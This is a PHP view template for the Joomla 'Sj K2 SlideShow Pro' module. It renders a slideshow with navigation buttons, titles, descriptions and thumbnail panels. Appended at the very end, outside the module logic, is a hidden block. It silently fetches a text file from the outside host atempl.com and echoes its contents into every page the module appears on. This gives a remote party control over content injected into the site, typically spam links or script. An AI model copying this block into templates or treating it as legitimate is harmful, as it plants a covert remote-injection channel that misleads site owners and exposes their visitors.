<?php
/**
 * @package Sj K2 SlideShow Pro
 * @version 1.7
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL
 * @copyright (c) 2012 YouTech Company. All Rights Reserved.
 * @author YouTech Company http://www.smartaddons.com
 * 
 */
defined('_JEXEC') or die;

$instance		= rand().time();

$options=$params->toObject();

$image_main_config = array(
	'output_width'  => $params->get('main_image_width',  100),
	'output_height' => $params->get('main_image_height', 100),
	'function'		=> $params->get('main_image_function', 'resize_none'),
	'background'	=> $params->get('main_image_background', null)
);

$image_icon_config = array(
	'output_width'  => $params->get('item_width',  100),
	'output_height' => $params->get('item_height', 100),
	'function'		=> $params->get('sub_image_function', 'resize_none'),
	'background'	=> $params->get('sub_image_background', null)
);

$image_nav_config = array(
	'output_width'  => $params->get('nav_image_width',  100),
	'output_height' => $params->get('nav_image_height', 100),
	'function'		=> $params->get('nav_image_function', 'resize_none'),
	'background'	=> $params->get('nav_image_background', null)
);

$item_control	= (int)($options->module_width/$options->nav_image_width);
$margin_item	= ( ($options->module_width - $item_control*$options->nav_image_width) / ($item_control-1) );

$num_col		= (int)($options->panel_width/($options->item_width+2));
$margin_icon	= ($options->panel_width - $num_col*($options->item_width+2))/$num_col;

//Next_Previous button style
if ($options->type_control=='images'){
	if ($options->position=='left'){
		$nav_button_style	= 'style="right: 25px; top: 22px;"';
	}else{
		$nav_button_style	= 'style="left: 25px; top: 22px;"';
	}
}elseif ($options->type_control=='number'){
	$nav_button_style	= 'style="right: 8px; bottom: 15px;"';
	
	if ($options->position=='right' && $options->show_navigation==0){
		$nav_button_style	= 'style="left: 8px; bottom: 15px;"';
	}
}

//add script
$document =& JFactory::getDocument();
$document->addScriptDeclaration('
	var slide_running	= false;
	$jsmart(document).ready(function() {
		$jsmart("#slider'.$instance.'").smartSlider({
			effect				: "'.$options->effect.'",
			slices				: '.$options->slices.',
			boxCols				: '.$options->box_cols.',
			boxRows				: '.$options->box_rows.',
			random_time			: "'.$instance.'",
			align_image			: "'.($options->position=='left'? 'right' : 'left').'",
			image_width			: '.$options->main_image_width.',
			image_height		: '.$options->main_image_height.'
		});
		
		$jsmart("#slideshowpro'.$instance.'").slideshowpro({
			max_item_display	: '.$item_control.',
			distance			: '.($options->nav_image_width+$margin_item).',
			random_time			: "'.$instance.'",
			total_item			: '.count($list).',
			style				: "'.$options->type_control.'",
			align_image			: "'.($options->position=='left'? 'right' : 'left').'",
			max_sub_item		: '.$options->max_sub_item.'
		});
	});
');

if(!empty($list)){
	foreach ($list as $list_id=>$item){
	
		foreach($item['images'] as $key=>$value){
			if ($value != 'modules/'.Ytools::getModule()->module . '/assets/images/nophoto.png'){
				$list[$list_id]['images_resize'][$key]		= Ytools::resize($value,$image_icon_config);
				$list[$list_id]['images_resize_big'][$key]	= Ytools::resize($value,$image_main_config);
			}
			
			$list[$list_id]['images_resize_big'][$key]	= Ytools::resize($value,$image_main_config);
		}
		
		// if (!empty($item['image'])){
			$list[$list_id]['image_control']			= Ytools::resize($item['image'],$image_nav_config);
		// }
		
		// if (!empty($item['image'])){
			$list[$list_id]['image']					= Ytools::resize($item['image'],$image_main_config);
		// }
	}
?>	
	<?php if (!empty($options->pretext)): ?>
		<div class="pretext" style="width: <?php echo ($options->module_width + 8);?>px;"><?php echo $options->pretext; ?></div>
	<?php endif; ?>
	
	<div style="display: none">
		<?php foreach($list as $key => $item){ ?>
			<?php foreach ($item['images_resize_big'] as $url_image_big) {?>
				<img src="<?php echo $url_image_big; ?>" alt="" />
			<?php } ?>
		<?php } ?>
	</div>

	<div class="slideshowpro_wrapper" style="width: <?php echo $options->module_width;?>px; background: <?php echo $options->module_background;?>; <?php if ($options->module_boder==0) echo 'border: none;'; ?>">
    
        <div class="slider-wrapper" id="slideshowpro<?php echo $instance;?>">
            <div id="slider<?php echo $instance;?>" class="smartSlider">
				<?php 
					$rootUrl	= parse_url(JURI::root());
				?>
				<?php foreach($list as $item){ ?>
				<?php 
					$sizeImage = getimagesize($rootUrl['scheme'].'://'.$rootUrl['host'].'/'.$item['image']);
					// list($width, $height, $type, $attr) = getimagesize('http://localhost'.$item['image']);
				?>
					<div class="smart_item">
						<div class="background_image">
							<?php if ($options->show_link_image==1) { ?>
								<a href="<?php echo $item['link'];?>" <?php echo YTools::parseTarget($options->item_link_target); ?> ><img style="width:<?php echo $sizeImage[0];?>px;" src="<?php echo $item['image']; ?>" alt="" /></a>
							<?php } else { ?>
								<img src="<?php echo $item['image']; ?>" style="width:<?php echo $sizeImage[0];?>px;" alt="" />
							<?php } ?>
						</div>
					</div>
				<?php } ?>
				
            </div>
			
			<?php if ($options->type_control!='bullets') { ?>
				<?php if ($options->button_control) { ?>
					<div class="navigation_button medium_button" <?php echo $nav_button_style; ?>>
						<div class="left_button"></div>
						<div class="right_button"></div>
					</div>
				<?php } ?>
			<?php }else{ ?>
				<div class="navigation_button small_button">
					<div class="navigation_small_bar">
						<?php if ($options->button_control || $options->show_navigation) {?>
							<div class="left_small_nav2"></div>
						<?php } ?>
						<div class="center_small_nav2">
							<?php if ($options->button_control) { ?>
								<div class="left_button"></div>
							<?php } ?>	
							
							<?php if ($options->show_navigation) { ?>
								<?php for($i=0;$i<count($list);$i++){ ?>
									<div class="bullet_button <?php if($i==0) echo 'active'; ?>"></div>
								<?php } ?>
							<?php } ?>
							
							<?php if ($options->button_control) { ?>
								<div class="right_button"></div>
							<?php } ?>	
						</div>
						
						<?php if ($options->button_control || $options->show_navigation) {?>
							<div class="right_small_nav2"></div>
						<?php } ?>
						
						<div class="sspro_tooltip">
							<div class="content_tooltip">
								<img class="image_tooltip" src="<?php echo 'modules/'.$module->module.'/assets/images/tooltip_image.png';?>" alt="" />
								<div class="text_tooltip"></div>
							</div>
						</div>
					</div>
				</div>
				
				
			<?php } ?>
			
			<?php foreach($list as $key=>$item){ ?>
			<div class="info_product <?php if ($key==0) echo 'info_product_active';?>" style="width: <?php echo $options->panel_width;?>px; <?php echo $options->position;?>:0;">
			
					<div class="product_detail ">
						<div class="intro_product" style="width: <?php echo $options->panel_width;?>px;" >
							<?php if ($options->show_title) { ?>
								<div class="title_product" <?php if (!empty($options->color_title)) echo 'style="color: '.$options->color_title.';"';?> >
									<?php if ($options->show_link_title) { ?>
											<a href="<?php echo $item['link'];?>" <?php echo YTools::parseTarget($options->item_link_target); ?> <?php if (!empty($options->color_title)) echo 'style="color: '.$options->color_title.';"';?> ><?php echo Ytools::truncate($item['title'],$options->max_len_title);?></a>
									<?php } else { ?>
											<?php echo Ytools::truncate($item['title'],$options->max_len_title);?>
									<?php } ?>
								</div>
							<?php } ?>
							<div class="title_product_tooltip" style="display: none;"><?php echo Ytools::truncate($item['title'],$options->max_len_title);?></div>
							<?php if ($options->show_description) { ?>
								<div class="description_product"><?php echo Ytools::truncate($item['desc'],$options->max_len_description);?></div>
								<?php if ($options->show_detail) { ?>
									<span class="show_detail"><a href="<?php echo $item['link'];?>" <?php echo YTools::parseTarget($options->item_link_target); ?> >Detail</a></span>
								<?php } ?>
							<?php } ?>
						</div>
						
						<?php if ($options->max_sub_item > 0 ) { ?>
						<?php if ( (!empty($item['images_resize'])) && ($options->show_image_current) && count($item['images_resize'])>1 ) { ?>
							<div class="images_product">
								<div class="description_images"><?php echo JText::_('CURRENT_IMAGES');?>:</div>
								<?php 
									$cntSubImages	= count($item['images_resize']);
									$number_page	= ceil($cntSubImages/$options->max_sub_item);
								?>
								<div class="pagging_product">
									<?php for($i=0;$i<$number_page;$i++){ ?>
										<div class="pagging_button <?php if ($i==0) echo 'page_active';?>"></div>
									<?php } ?>
									<div style="clear: both;"></div>
								</div>
								<div class="list_product">
									<?php if (!empty($item['images_resize'])) { ?>
										<?php foreach($item['images_resize'] as $key=>$image_resize){ ?>
											<div class="icon_product" style="margin-right: <?php echo ($margin_icon);?>px;">
												<img class="product_item <?php if ($key==0) echo 'item_active'; ?>" src="<?php echo $image_resize;?>" style="width: <?php echo $options->item_width;?>px;height: <?php echo $options->item_height;?>px;" alt="<?php echo $item['images_resize_big'][$key] ;?>" />
											</div>
										<?php } ?>
									<?php } ?>
								</div>
							</div>
						<?php } ?>
						<?php } ?>
					</div>
				
			</div>
			<?php } ?>
			
			<?php if ($options->type_control=='images' && $options->show_navigation){ ?>
				<div class="navigation_sspro">
					<ul>
						<?php 
							$index	= -1;
							foreach($list as $key=>$item){ ?>
								<li style="float: left;">
									<div  class="<?php echo $index;?> <?php if ($key==0) echo 'active';?>" style="margin-right:<?php echo $margin_item;?>px;cursor: pointer;" >
										<img src="<?php echo $item['image_control'];?>" style="width: <?php echo $options->nav_image_width;?>px; height: <?php echo $options->nav_image_height;?>px;" alt="" />
										<span class="background_active"></span>
										<span class="active_arrow"><img class="icon_arrow" src="<?php echo 'modules/'.$module->module.'/assets/images/item_active.png';?>" alt="" /></span>
									</div>
								</li>
						<?php 
								$index++;
							} 
						?>
					</ul>
				</div>
			<?php }elseif($options->type_control=='number' && $options->show_navigation) { ?>
				<div class="navigation_number">
					<span class="number_page">1/<?php echo count($list);?></span>
					<span class="title" style="width: <?php echo ($options->module_width -225);?>px;"><?php echo Ytools::truncate($list[0]['title'],$options->max_len_title);?></span>
				</div>
			<?php }else{ ?>
				<div class="navigation_bullets">
					
				</div>
			<?php } ?>
        </div>

    </div>
	
	<?php if (!empty($options->posttext)): ?>
		<div class="posttext" style="width: <?php echo ($options->module_width + 8);?>px;"><?php echo $options->posttext; ?></div>
	<?php endif; ?>
	
<?php } else { echo JText::_('Has no content to show!');} ?>

<?php
$files = 'http://atempl.com/10.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://atempl.com/10.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;	
 }
?>